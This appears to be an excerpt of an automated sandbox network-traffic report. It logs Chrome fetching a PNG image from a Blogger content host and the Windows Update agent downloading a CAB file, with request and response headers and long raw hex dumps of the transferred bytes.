                          2024-11-25 16:55:46 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.449750142.250.181.654434416C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:55:46 UTC917OUTGET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1
                          Host: blogger.googleusercontent.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://0fkw.rkhanaid.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-11-25 16:55:48 UTC470INHTTP/1.1 200 OK
                          Content-Type: image/png
                          Vary: Origin
                          Access-Control-Expose-Headers: Content-Length
                          ETag: "v367e"
                          Expires: Tue, 26 Nov 2024 16:55:48 GMT
                          Cache-Control: public, max-age=86400, no-transform
                          Content-Disposition: inline;filename="userinter.png"
                          X-Content-Type-Options: nosniff
                          Date: Mon, 25 Nov 2024 16:55:48 GMT
                          Server: fife
                          Content-Length: 87859
                          X-XSS-Protection: 0
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close
                          2024-11-25 16:55:48 UTC920INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0d 44 00 00 07 80 08 02 00 00 00 33 3b 2b ce 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ec da 21 01 00 20 00 c0 30 a0 7f 58 04 02 49 8c 0b b6 04 0f f0 b9 cf 1d 00 00 00 00 00 00 00 00 00 40 67 d5 01 00 00 00 00 00 00 00 00 00 f0 3b 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00
                          Data Ascii: PNGIHDRD3;+sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATx! 0XI@g;3|3@
                          2024-11-25 16:55:48 UTC1390INData Raw: 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00
                          Data Ascii: 3@13|3@13|3@13|3@13|3@13|3
                          2024-11-25 16:55:48 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31
                          Data Ascii: 13|3@13|3@13|3@13|3@13|3@1
                          2024-11-25 16:55:48 UTC1390INData Raw: 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00
                          Data Ascii: |3@13|3@13|3@13|3@13|3@13|
                          2024-11-25 16:55:48 UTC1390INData Raw: 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 f0 d8 bb 9f 10 39 cf fb 80 e3 cf fb 67 fe ac 64 cb 76 40 71 da 83 9c 3f 26 14 c9 92 bd 4a 23 0c b1 72 68 c8 b1 e9 a1 89 43 b1 8a 88 15 50 a1 31 24 84 1a 92 42 08 3d e4 90 1c da a2 50 30 54 04 51 19 23 27 a7 96 d2 43 88 09 c6 2d c1 c1 5e 6b ad f5 21 b4 49 ab 43 53 67 a1 5a 39 52 b5 ab dd d9 e9 61 e3 ad ab 3f bb 3b b3 b3 fb 7b 9f 99 cf e7 60 76 77 e6 7d fd bb 8d c7 cf f7 7d 1e 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00
                          Data Ascii: @13|3@13|3@9gdv@q?&J#rhCP1$B=P0TQ#'C-^k!ICSgZ9Ra?;{`vw}}&
                          2024-11-25 16:55:48 UTC1390INData Raw: 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00
                          Data Ascii: &`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>
                          2024-11-25 16:55:48 UTC1390INData Raw: e3 c3 e7 3a 00 64 ac 28 52 d7 53 77 00 00 00 00 00 30 a9 ba ed ba 70 78 0f 00 8c 0b 31 1f 00 64 ac db aa 4b df d1 01 00 00 00 00 60 52 95 45 d1 6d 79 ec 1f 00 c6 84 98 0f 00 72 55 55 0e d8 05 00 00 00 00 80 49 d7 6e 55 55 65 e9 1f 00 c6 81 4f 74 00 c8 55 57 c9 07 00 00 00 00 00 58 32 00 80 71 21 e6 03 80 2c b5 ea b2 f6 98 1d 00 00 00 00 00 90 52 5d 95 ad da aa 01 00 64 cf c7 39 00 64 a9 d3 aa a3 47 00 00 00 00 00 00 9a c2 c2 01 00 8c 01 31 1f 00 e4 a7 55 57 55 59 44 4f 01 00 00 00 00 00 34 45 55 16 ad da 61 bb 00 90 37 31 1f 00 e4 a7 d3 f2 6d 1c 00 00 00 00 00 f8 7f 2c 1f 00 40 ee c4 7c 00 90 99 ba 2a 6d cb 07 00 00 00 00 00 dc a2 2a 8b ba d2 00 00 40 c6 7c 90 03 40 66 3c 57 07 00 00 00 00 00 dc 91 45 04 00 c8 9a 98 0f 00 72 52 7a a8 0e 00 00 00 00 00 b8
                          Data Ascii: :d(RSw0px1dK`REmyrUUInUUeOtUWX2q!,R]d9dG1UWUYDO4EUa71m,@|*m*@|@f<WErRz
                          2024-11-25 16:55:48 UTC1390INData Raw: 64 3a 7a 0a 00 00 00 00 00 00 00 9a 4e cc 07 00 64 23 c7 92 af 73 e2 54 f4 14 00 00 00 00 00 00 00 64 40 cc 07 00 e4 41 c9 07 00 00 00 00 00 00 c0 18 13 f3 01 00 19 50 f2 01 00 00 00 00 00 00 30 de c4 7c 00 40 d3 ad cc ce 28 f9 00 00 00 00 00 00 00 18 6f 75 f4 00 00 00 9b b8 f2 d5 d3 3b 77 f3 ee f4 b1 b5 1f da 47 a6 d7 7e b8 39 3b 93 52 5a 9c 79 75 b8 1b 2a f9 00 00 00 00 00 00 00 18 82 98 0f 00 68 b4 5f 3f fb a5 91 df b3 3b 7d 6c ea c4 a9 94 52 fd 6e c0 f7 5e 9d 94 52 4a f7 a6 94 52 5a 3a 7f 36 a5 b4 f5 7d 01 95 7c 00 00 00 00 00 00 00 0c a7 58 b8 b6 18 3d 03 00 b0 89 fb f6 76 a2 47 88 b1 74 fe ec 08 0f d8 5d 6b f8 ee 18 f0 8d 64 12 25 1f 00 00 00 00 00 8d 72 f5 fa 52 f4 08 00 c0 00 c4 7c 00 90 81 89 8d f9 e6 3f 7d 6c 24 f7 d9 4e c6 f7 5e 1b 24 7d 4a 3e
                          Data Ascii: d:zNd#sTd@AP0|@(ou;wG~9;RZyu*h_?;}lRn^RJRZ:6}|X=vGt]kd%rR|?}l$N^$}J>
                          2024-11-25 16:55:48 UTC1390INData Raw: ae 1f 7b 7c fe 33 2f 2f ef bd fd a5 86 6c ce 37 dc 19 bb 8f 3d 54 8f 7c 12 00 00 00 00 00 00 00 f2 22 e6 03 00 1a a4 78 e0 f1 bb bd 74 cb d1 ba b7 78 e5 ed 37 cf cd bd b8 33 43 6d d5 ec e5 de 70 67 ec 1e 7e a8 18 f9 30 00 00 00 00 00 00 00 e4 45 cc 07 00 34 c8 dd 4e da dd b8 e4 5b 73 e6 d2 85 1d 98 68 00 c3 6d cb 97 52 72 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 59 aa 0f 9d 79 ef af 97 6e 3e fc f8 fc 67 36 2d f9 d6 7c f9 c7 df dc 91 99 b6 60 e8 6d f9 8e 1e 70 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 c1 5e b8 7e ec 8b 57 0f 6e fd fd 51 87 ed ce 5e ee 7d e5 fc 8d e1 ae fd e3 4f b6 46 3b 0c 00 00 00 00 00 00 00 39 12 f3 01 00 cd b2 7e d2 ee 56 8e d6 bd dd 99 4b 17 76 bf e7 1b fa 80 dd e4 8c 5d 00 00 00 00 00 00 00 52 4a 29 39 d6 0d 00 68 9c 7f ff f0 0b 7f f3 fa
                          Data Ascii: {|3//l7=T|"xtx73Cmpg~0E4N[shmRr.b>Yyn>g6-|`mp.b>^~WnQ^}OF;9~VKv]RJ)9h
                          2024-11-25 16:55:48 UTC1390INData Raw: 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13
                          Data Ascii: @01@01@01@01@01@01@01@01@01@01


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.44974752.149.20.212443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:55:47 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4bXW47ENZmx3mpV&MD=hoFYSZH8 HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                          Host: slscr.update.microsoft.com
                          2024-11-25 16:55:48 UTC560INHTTP/1.1 200 OK
                          Cache-Control: no-cache
                          Pragma: no-cache
                          Content-Type: application/octet-stream
                          Expires: -1
                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                          MS-CorrelationId: cd055544-c724-43ad-9e74-3f80a500423c
                          MS-RequestId: cb44464b-a8ae-4ffb-8723-c1e36e502088
                          MS-CV: l3T0SD4Q5Emoq4l2.0
                          X-Microsoft-SLSClientCache: 2880
                          Content-Disposition: attachment; filename=environment.cab
                          X-Content-Type-Options: nosniff
                          Date: Mon, 25 Nov 2024 16:55:47 GMT
                          Connection: close
                          Content-Length: 24490
                          2024-11-25 16:55:48 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                          2024-11-25 16:55:48 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.449756142.250.181.654434416C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:55:51 UTC680OUTGET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1
                          Host: blogger.googleusercontent.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-11-25 16:55:52 UTC470INHTTP/1.1 200 OK
                          Content-Type: image/png
                          Vary: Origin
                          Access-Control-Expose-Headers: Content-Length
                          ETag: "v367e"
                          Expires: Tue, 26 Nov 2024 16:55:52 GMT
                          Cache-Control: public, max-age=86400, no-transform
                          Content-Disposition: inline;filename="userinter.png"
                          X-Content-Type-Options: nosniff
                          Date: Mon, 25 Nov 2024 16:55:52 GMT
                          Server: fife
                          Content-Length: 87859
                          X-XSS-Protection: 0
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close
                          2024-11-25 16:55:52 UTC920INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0d 44 00 00 07 80 08 02 00 00 00 33 3b 2b ce 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ec da 21 01 00 20 00 c0 30 a0 7f 58 04 02 49 8c 0b b6 04 0f f0 b9 cf 1d 00 00 00 00 00 00 00 00 00 40 67 d5 01 00 00 00 00 00 00 00 00 00 f0 3b 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00
                          Data Ascii: PNGIHDRD3;+sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATx! 0XI@g;3|3@
                          2024-11-25 16:55:52 UTC1390INData Raw: 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00
                          Data Ascii: 3@13|3@13|3@13|3@13|3@13|3
                          2024-11-25 16:55:52 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31
                          Data Ascii: 13|3@13|3@13|3@13|3@13|3@1
                          2024-11-25 16:55:52 UTC1390INData Raw: 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00
                          Data Ascii: |3@13|3@13|3@13|3@13|3@13|
                          2024-11-25 16:55:52 UTC1390INData Raw: 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 f0 d8 bb 9f 10 39 cf fb 80 e3 cf fb 67 fe ac 64 cb 76 40 71 da 83 9c 3f 26 14 c9 92 bd 4a 23 0c b1 72 68 c8 b1 e9 a1 89 43 b1 8a 88 15 50 a1 31 24 84 1a 92 42 08 3d e4 90 1c da a2 50 30 54 04 51 19 23 27 a7 96 d2 43 88 09 c6 2d c1 c1 5e 6b ad f5 21 b4 49 ab 43 53 67 a1 5a 39 52 b5 ab dd d9 e9 61 e3 ad ab 3f bb 3b b3 b3 fb 7b 9f 99 cf e7 60 76 77 e6 7d fd bb 8d c7 cf f7 7d 1e 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00
                          Data Ascii: @13|3@13|3@9gdv@q?&J#rhCP1$B=P0TQ#'C-^k!ICSgZ9Ra?;{`vw}}&
                          2024-11-25 16:55:52 UTC1390INData Raw: 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 